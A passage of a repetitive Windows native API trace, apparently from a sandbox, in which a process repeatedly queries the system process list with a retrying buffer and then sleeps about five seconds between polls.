ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.845] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.875] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.890] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.904] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 